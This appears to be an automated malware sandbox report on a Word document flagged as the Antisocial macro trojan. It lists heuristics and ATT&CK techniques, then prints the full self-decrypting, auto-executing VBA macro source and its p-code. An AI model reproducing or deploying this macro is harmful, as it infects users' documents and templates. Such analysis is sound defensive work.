MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The Document_Open macro is designed to deobfuscate and execute code, as indicated by the p-code auto-execution heuristic and the script's structure. This behavior strongly suggests the macro's purpose is to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 5
-
ClamAV: Doc.Trojan.Antisocial-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-1
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Application.ScreenUpdating = Int(Rnd * 0)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8721 bytes |
SHA-256: 980399b675f9720ab9dc4fbe7f8124829dd582a48871710a6bc30a2d2c6bbe28 |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.ScreenUpdating = Int(Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
For V1 = 20 To 61
V2 = Null
V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
V4 = Asc((Mid(V3, 2, 1)))
V5 = V4 Xor 39
For V6 = 3 To Len(V3)
V7 = Asc(Mid(V3, V6, 1)) Xor V5
V2 = V2 & Chr(V7)
Next
V8 = V2
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
Next
Call VM
End Sub
Private Sub VM()
'$Elq#U2#>#13#Wl#52
'$U1#>#Mvoo
'%T1"?" % "$"*VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*T3."3++
'"S1%8%Lkq-Wka-,%/%=,%.%4
'%Dmp"T7"?"3"Vm"Ngl*T1+
'"S3%8%Dvf-Hla-S6)%S0)%4,,%]jw%S1
'$U1#>#U1#%#@kq+U5*
'/Fmp|(^=
'#R3$9$R6
'%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"T3." % "$"T5
'!Hc~r&P7
'!Ivroihu(Eih`otkEihpctuoihu&;&Ohr.Thb&,&6/
'"Juqljkv+Vds`KjwhdiUwjhuq%8%Lkq-Wka%/%5,
' Hwsnhit)QnurtWuhsbdsnhi':'Nis/Uic'-'7.
'%OT"?"VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*3."VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,AmwlvMdNklgq+
' IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
'%LmpocnVgorncvg,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,CffDpmoQvpkle"OT
'/An(Ik|a~mLgk}emf|&ZmilGfdq(5(\z}m(\`mf
'&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcOnsl`m
'&@buhwdEnbtldou/Sdmn`e
' FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
'#Egpmra@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*E``BvkiWpvmjc$IR
'#Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia
'&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcSd`eNomx
'&@buhwdEnbtldou/Sdmn`e
'%Gnqg
'&@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/EdmdudMhodr!0-!@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/BntouNgMhodr
'!GeropcBieskchr(PDVtilcer(PDEikvihchru(Orck.7/(EibcKibsjc(Gbb@tikUrtoha&KP
'"Dfqls`Ajfph`kq+Vds`Dv%Cli`Kdh`?8Dfqls`Ajfph`kq+CpiiKdh`
'"@ka%Lc
'%Q{qvgo,RpktcvgRpmdkngQvpkle* ." JIG[]ANCQQGQ]PMMV^,n{q ." +"?" T@QDkng
'#W}wpai*TvmrepaTvkbmhaWpvmjc,&&($&LOA][HKGEH[IEGLMJAXWkbpsevaXImgvkwkbpXSmj`kswXGqvvajpRavwmkjXVqj&($&&-$9$&G>XImvamhha*h}w&
'!Ivch&$E<ZKotcojjc(j u$&@it&Isrvsr&Gu&%7
' Wunis'$6+'%Tbs'phuchem':'DubfsbHembds/%'!'Dou/43.'!'%Phuc)Fwwkndfsnhi%'!'Dou/43.'!'%.%
'#Tvmjp$'5($&Imvamhha$9$swgvmtp*WgvmtpBqhhJeia&
'/Xzaf|(+9$(*[m|(F\(5( gzlgjb&Fgzeid\mexdi|m&^JXzgbmk|&^JKgexgfmf|{&A|me 9!*
'!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&HR(EibcKibsjc(EishrI`Johcu$
'&Qshou!"0-!#OU/BnedLnetmd/@eeGsnlGhmd!Lhsdhmmd#
'!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&1$
'!Vtohr&%7*&$qitbidl(Wsor$
'&Qshou!"0-!LW
'#Ghkwa$'5
End Sub
' Processing file: /tmp/qstore_oeck2b3e
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13977 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Ld Rnd
' LitDI2 0x0000
' Mul
' FnInt
' Ld Application
' MemSt ScreenUpdating
' Line #2:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #3:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #4:
' StartForVariable
' Ld V1
' EndForVariable
' LitDI2 0x0014
' LitDI2 0x003D
' For
' Line #5:
' LitVarSpecial (Null)
' St V2
' Line #6:
' Ld V1
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Paren
' St V3
' Line #7:
' Ld V3
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' St V4
' Line #8:
' Ld V4
' LitDI2 0x0027
' Xor
' St V5
' Line #9:
' StartForVariable
' Ld V6
' EndForVariable
' LitDI2 0x0003
' Ld V3
' FnLen
' For
' Line #10:
' Ld V3
' Ld V6
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld V5
' Xor
' St V7
' Line #11:
' Ld V2
' Ld V7
' ArgsLd Chr 0x0001
' Concat
' St V2
' Line #12:
' StartForVariable
' Next
' Line #13:
' Ld V2
' St V8
' Line #14:
' Ld V1
' Ld V8
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall ReplaceLine 0x0002
' Line #15:
' StartForVariable
' Next
' Line #16:
' ArgsCall (Call) VM 0x0000
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Private Sub VM())
' Line #19:
' QuoteRem 0x0000 0x0012 "$Elq#U2#>#13#Wl#52"
' Line #20:
' QuoteRem 0x0000 0x000A "$U1#>#Mvoo"
' Line #21:
' QuoteRem 0x0000 0x0051 "%T1"?" % "$"*VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*T3."3++"
' Line #22:
' QuoteRem 0x0000 0x0018 ""S1%8%Lkq-Wka-,%/%=,%.%4"
' Line #23:
' QuoteRem 0x0000 0x0016 "%Dmp"T7"?"3"Vm"Ngl*T1+"
' Line #24:
' QuoteRem 0x0000 0x0020 ""S3%8%Dvf-Hla-S6)%S0)%4,,%]jw%S1"
' Line #25:
' QuoteRem 0x0000 0x0012 "$U1#>#U1#%#@kq+U5*"
' Line #26:
' QuoteRem 0x0000 0x0008 "/Fmp|(^="
' Line #27:
' QuoteRem 0x0000 0x0008 "#R3$9$R6"
' Line #28:
' QuoteRem 0x0000 0x0050 "%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"T3." % "$"T5"
' Line #29:
' QuoteRem 0x0000 0x0008 "!Hc~r&P7"
' Line #30:
' QuoteRem 0x0000 0x002A "!Ivroihu(Eih`otkEihpctuoihu&;&Ohr.Thb&,&6/"
' Line #31:
' QuoteRem 0x0000 0x0028 ""Juqljkv+Vds`KjwhdiUwjhuq%8%Lkq-Wka%/%5,"
' Line #32:
' QuoteRem 0x0000 0x0027 " Hwsnhit)QnurtWuhsbdsnhi':'Nis/Uic'-'7."
' Line #33:
' QuoteRem 0x0000 0x008A "%OT"?"VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*3."VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,AmwlvMdNklgq+"
' Line #34:
' QuoteRem 0x0000 0x008E " IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt"
' Line #35:
' QuoteRem 0x0000 0x004A "%LmpocnVgorncvg,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,CffDpmoQvpkle"OT"
' Line #36:
' QuoteRem 0x0000 0x0027 "/An(Ik|a~mLgk}emf|&ZmilGfdq(5(\z}m(\`mf"
' Line #37:
' QuoteRem 0x0000 0x002A "&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcOnsl`m"
' Line #38:
' QuoteRem 0x0000 0x0016 "&@buhwdEnbtldou/Sdmn`e"
' Line #39:
' QuoteRem 0x0000 0x008E " FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt"
' Line #40:
' QuoteRem 0x0000 0x004A "#Egpmra@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*E``BvkiWpvmjc$IR"
' Line #41:
' QuoteRem 0x0000 0x0038 "#Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia"
' Line #42:
' QuoteRem 0x0000 0x002C "&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcSd`eNomx"
' Line #43:
' QuoteRem 0x0000 0x0016 "&@buhwdEnbtldou/Sdmn`e"
' Line #44:
' QuoteRem 0x0000 0x0005 "%Gnqg"
' Line #45:
' QuoteRem 0x0000 0x008E "&@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/EdmdudMhodr!0-!@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/BntouNgMhodr"
' Line #46:
' QuoteRem 0x0000 0x004A "!GeropcBieskchr(PDVtilcer(PDEikvihchru(Orck.7/(EibcKibsjc(Gbb@tikUrtoha&KP"
' Line #47:
' QuoteRem 0x0000 0x0038 ""Dfqls`Ajfph`kq+Vds`Dv%Cli`Kdh`?8Dfqls`Ajfph`kq+CpiiKdh`"
' Line #48:
' QuoteRem 0x0000 0x0007 ""@ka%Lc"
' Line #49:
' QuoteRem 0x0000 0x0049 "%Q{qvgo,RpktcvgRpmdkngQvpkle* ." JIG[]ANCQQGQ]PMMV^,n{q ." +"?" T@QDkng"
' Line #50:
' QuoteRem 0x0000 0x007C "#W}wpai*TvmrepaTvkbmhaWpvmjc,&&($&LOA][HKGEH[IEGLMJAXWkbpsevaXImgvkwkbpXSmj`kswXGqvvajpRavwmkjXVqj&($&&-$9$&G>XImvamhha*h}w&"
' Line #51:
' QuoteRem 0x0000 0x0028 "!Ivch&$E<ZKotcojjc(j u$&@it&Isrvsr&Gu&%7"
' Line #52:
' QuoteRem 0x0000 0x0057 " Wunis'$6+'%Tbs'phuchem':'DubfsbHembds/%'!'Dou/43.'!'%Phuc)Fwwkndfsnhi%'!'Dou/43.'!'%.%"
' Line #53:
' QuoteRem 0x0000 0x002E "#Tvmjp$'5($&Imvamhha$9$swgvmtp*WgvmtpBqhhJeia&"
' Line #54:
' QuoteRem 0x0000 0x004B "/Xzaf|(+9$(*[m|(F\(5( gzlgjb&Fgzeid\mexdi|m&^JXzgbmk|&^JKgexgfmf|{&A|me 9!*"
' Line #55:
' QuoteRem 0x0000 0x0044 "!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&HR(EibcKibsjc(EishrI`Johcu$"
' Line #56:
' QuoteRem 0x0000 0x002F "&Qshou!"0-!#OU/BnedLnetmd/@eeGsnlGhmd!Lhsdhmmd#"
' Line #57:
' QuoteRem 0x0000 0x002B "!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&1$"
' Line #58:
' QuoteRem 0x0000 0x0019 "!Vtohr&%7*&$qitbidl(Wsor$"
' Line #59:
' QuoteRem 0x0000 0x000D "&Qshou!"0-!LW"
' Line #60:
' QuoteRem 0x0000 0x0009 "#Ghkwa$'5"
' Line #61:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.